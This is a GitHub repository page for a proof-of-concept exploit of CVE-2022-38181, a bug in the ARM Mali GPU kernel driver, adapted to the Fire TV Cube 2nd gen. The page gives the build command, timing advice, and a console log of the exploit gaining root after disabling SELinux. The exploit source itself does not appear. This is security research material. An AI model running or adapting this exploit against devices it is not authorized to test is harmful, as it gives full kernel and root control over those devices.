Skip to content

Pro-me3us/CVE_2022_38181_Raven

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

8 Commits
 
 
 
 
 
 
 
 
 
 

Repository files navigation

Exploit for CVE-2022-38181 for FireTV 2nd gen Cube

This is a fork of security researcher Man Yue Mo's Pixel 6 POC for CVE_2022_38181. Read his detailed write-up of the vulnerability here. Changes have been made to account for FireOS's 32bit userspace, as well as the 2nd gen Cube's older Bifrost drivers (r16p0) and Linux kernel (4.9.113) versions. The POC exploits a bug in the ARM Mali kernel driver to gain arbitrary kernel code execution, which is then used to disable SELinux and gain root.

I used the following command to compile with clang in ndk-21:

android-ndk-r21d/toolchains/llvm/prebuilt/linux-x86_64/bin/armv7a-linux-androideabi30-clang -DSHELL mali_shrinker_mmap32.c -o raven_shrinker

The exploit should be run 30-90sec after the Cube boots for greatest reliability.

raven:/ $ /data/local/tmp/raven_shrinker
fingerprint: Amazon/raven/raven:9/PS7624.3337N/0026810845440:user/amz-p,release-keys
failed, retry.
failed, retry.
failed, retry.
failed, retry.
region freed 80
alias gpu va 100c85000
read 0
cleanup flush region
release_mem_pool
jit_freed
jit_free commit: 2 0
Found freed_idx 2
Found pgd 23, 100cce000
overwrite addr : 104100634 634
overwrite addr : 104300634 634
overwrite addr : 1041001c4 1c4
overwrite addr : 1043001c4 1c4
result 50
raven:/ # 

About

CVE-2022-38181 POC for FireTV 2nd gen Cube (raven)

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages